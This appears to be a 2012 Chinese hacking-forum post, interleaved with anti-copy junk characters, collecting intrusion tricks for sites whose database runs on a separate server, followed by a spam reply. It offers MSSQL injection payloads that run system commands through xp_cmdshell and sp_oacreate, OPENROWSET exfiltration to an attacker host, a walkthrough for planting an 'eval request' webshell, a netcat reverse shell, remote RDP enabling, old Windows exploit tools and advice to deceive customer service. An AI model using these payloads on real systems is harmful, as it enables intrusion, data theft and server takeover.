找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3394|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关. N+ T5 K/ c% x, r' V0 `8 S& T
2 L2 G0 n: {) X" x6 z- T

% Q2 X/ {+ R1 GSA点数据库分离搞法+语句:1 d$ a' S/ s0 Y8 T0 o
  \. a- F) X% ~7 S% U( O
注射点不显错,执行下面三条语句页面都返回正常。
4 i" q* q) L; H% F3 e% R# Kand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread'). e5 @2 F5 O0 @. Y# _
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')* T( r' y( K9 O/ J8 ^+ _8 V
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell'). V5 B+ }! M9 e" x4 J0 c4 r
可以列目录,判断系统为2000,web与数据库分离+ t  F+ }% {1 W$ e/ z1 _
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。' h1 O) R/ ]8 b" T0 A8 y* Y
在注射点上执行
6 y1 L! ^" o7 A6 S7 b; udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--" i& J2 F* M0 H- h: M! Y
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
% N8 K3 O" B% x/ @& z8 D& P还有我用NC监听得其他端口都没有得到IP。5 x1 I/ k0 P/ ?& r: }" F

, `% ^. C1 h+ ]/ q! J  v通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。" \& f* A+ m' O& D0 ]9 k  x
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--" X8 A7 N& N6 z3 t; a5 Y" N& v
5 p# V5 ?* e" _1 h# G6 ]) ~7 J# g9 t
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--, m) X9 o, a6 Z
* ~9 p2 [9 O  A0 R6 U& [
现在就猜想是不是数据库是内网而且不能连外网。
4 v5 j' L. p6 a. \& {( F& |5 E2 C$ q; V/ R& S

7 e6 Y9 E( @( h. F; [8 x1 {. d4 raccess导出txt文本代码+ _) a8 X6 g' ]. f3 q& l
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin. y: @( C5 @2 C" t

: [4 ^2 c$ ]: \' n" A. S: g6 T8 {

2 T0 H9 s$ F$ G3 O/ a) {8 O自动跳转到指定网站代码头
( b" ?' U4 P# |<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>5 u" f% [" Z( X6 q: a7 `

" B& U4 w4 y( s- }- m9 X- Y3 W  c3 C7 d- z0 u" j
入侵java or jsp站点时默认配置文件路径:
5 k& s* E5 g- i1 X/ w- l\web-inf\web.xml& V$ k% Y, H3 v, t: d% o1 Q4 T
tomcat下的配置文件位置:
1 z  s1 K9 L# |8 i2 B" W1 b7 A' c\conf\server.xml            (前面加上tomcat路径)
* k" M  c$ y$ Z: L5 N\Tomcat 5.0\webapps\root\web-inf\struts-config.xml: ]( e2 I8 [6 H! c. \
, O. b4 ~. }& D! y3 x* N

1 H. @; t" @0 |, G3 l1 N5 O
4 j1 N# e$ {9 A* m7 `7 D$ j6 X检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
# A" H0 X" M9 J# Z& n* m-1%23
  _$ V- _/ T/ Y2 a$ y! d> + u; _( }/ R! ?; o9 Q
<( \# o* u  g, K' w+ a( ]
1'+or+'1'='1
& x. Q/ y' x0 G# e* r* jid=8%bf- T% k: V: I: M

! a9 K2 {1 n2 E) m1 |+ J9 M2 P7 h9 N0 U全新注入点检测试法:% ]3 O  H* u5 F" B! }* a
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
( ^( ]! w# O; Q7 u$ ~& V  J7 ]. @1 F8 Q8 g- ?) j9 V1 Y6 j4 _2 M# _
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。) I8 O! f# a! d7 M& o9 ^

1 j( v1 D7 T7 Q  z/ U' f0 b搜索型注入判断方法:
$ x% y- m: T. E& B2 o+ l& Q北京%' and '1'='1' and '%'='6 f* C  c5 z: d1 J
北京%' and '1'='2' and '%'='! r8 u$ p- Y/ e# N( F

8 B% ~- Q: z6 r  e$ m; D% M- a/ x9 c: X1 y1 e) U
COOKIES注入:
8 ?4 ?# X2 T3 J; o0 A
# O+ i' Q" E2 e& u2 f, `javascript:alert(document.cookie="id="+escape("51 and 1=1"));
" t! Q7 i& r! G1 m5 o
8 q0 m& f$ B+ w( K2000专业版查看本地登录用户命令:: f2 m) _8 B! g, H
net config workstation
7 \3 t! ~% F& L7 o5 v' }' v( X. |7 A  H3 ^0 R0 G, j8 s

' @& B1 B( }% [2 y/ ~1 ^) P2003下查看ipsec配置和默认防火墙配置命令:8 [! _& {, `9 v+ [  R& v5 a2 C! f
netsh firewall show config
0 q0 o" q! q, Z4 r- p' Wnetsh ipsec static show all' n+ R4 x& ?/ n. |! v$ p8 a
. Q6 e1 F+ k' M$ Y! }
不指派指定策略命令:( }" d8 |, [. M# z
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
; }! e+ w/ E! S% J- B' D. anetsh ipsec static show policy all  显示策略名6 G9 N: f0 W0 }' m2 C& n' @6 e

7 E" G5 s* \- ^9 {
& L& w9 H6 O- Y: g1 O" y猜管理员后台小技巧:/ _$ S  l( M; K
admin/left.asp + l! H" N6 I6 S8 J* K8 ]
admin/main.asp
' G" K: s( L) S* G# ^& hadmin/top.asp
( b- u4 w4 E# o3 F1 Badmin/admin.asp
: c% T9 z! Q: ]% S会现出菜单导航,然后迅雷下载全部链接. ^2 I) ?1 v% ?& p
2 L7 a6 o6 I" m2 P4 ]2 r3 r

  a8 g' s/ `0 [0 e% f社会工程学:
# e3 O! \  J$ v' g8 u* c用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人, u5 G" P/ H4 F6 B# y
然后去骗客服7 t: L' Z- h# e: {

1 u7 o% d  S" U( K9 E* [) K) R1 U: H+ k2 o
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: " ~% U" D8 y, n, k
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
! X1 t, ?1 |/ y# ~0 v8 U. \  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
- }% L# K5 o/ h  Y( J
, E. Q8 @" M, i
/ z+ y6 [3 ?, o, Z- f$ m/ t
! Q5 Y; Q! N- X/ h7 @& }6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
# A2 O" ]% _7 d) m. n0 O# M% i
% V/ y& S# u& J
( F0 E& o: H, K( U) {4 B0 ^- k9 c. R: }6 V4 Q. D
CMD加密注册表位置# T3 I5 g* o9 k6 W
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
9 `, o4 P! v. F/ c4 W% ?0 RAutoRun- s/ B" K( Q$ Y6 M' Y, L* J, ^
3 i, _3 l0 w3 M' [9 ^/ j5 E9 }8 c
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor/ k( R/ _% K& t& m5 M. ]
AutoRun7 M" y( t0 x" Z
+ A$ ^2 S2 t0 \5 x' V! F0 z
2 m* ]# b, R  {8 j4 D& e
在找注入时搜索Hidden,把他改成test
) u5 s$ E- i, c( ]* E8 j7 ~$ K( J% I1 R* @% @1 u' @6 c5 f

& }7 ^. N) A6 p% }1 n, ^% J/ N/ z; _8 C1 Y6 e/ G- m- |. L
mstsc /v:IP /console 4 |# ?; g3 C* T9 U2 I: _

+ h$ d4 @' h8 L4 S$ n
. j5 _9 H" {8 z) S; O# C一句话开3389:6 E- S4 x* P$ L# O. A

2 _5 Q& {9 f, e. ]$ O6 [' n最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  ( v* g! n! l$ \4 Y
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
& H5 [9 z/ Y8 E- f) w" F
5 }" p2 M6 @# b( t. s5 S6 e; W1 B3 G% S3 K8 {1 F& ]
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:+ S: }) x! f! Z9 b0 q9 J, G% B
Insert into admin(user,pwd) values('test','test')* h5 E: Q* S8 l$ [0 z& l
. n2 A* R9 H0 ?% T/ l3 I
. d# ?' V* j2 E( D$ i( e! g
NC反弹
$ }) h* c: N1 D" _先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   , e0 |9 q0 b# I' l9 c
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
; w/ j  L- u, P" R# y! Z: a. |/ q, U. f4 ?  w+ y" b

5 G( ^- b: S- z在脚本入侵过程中要经常常试用%00来确认下参数是否有问题# J9 j( ?- \3 c) ~# G9 O. e- z) n% e
  ?% W: @. w. x. J5 k
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
: ]1 g# X+ z- H, T4 P例如:
/ C: N' B6 ^$ C% I% b# I6 Asubst k: d:\www\ 用d盘www目录替代k盘# |+ J; D/ A: s: R) D0 B7 s- [- p
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表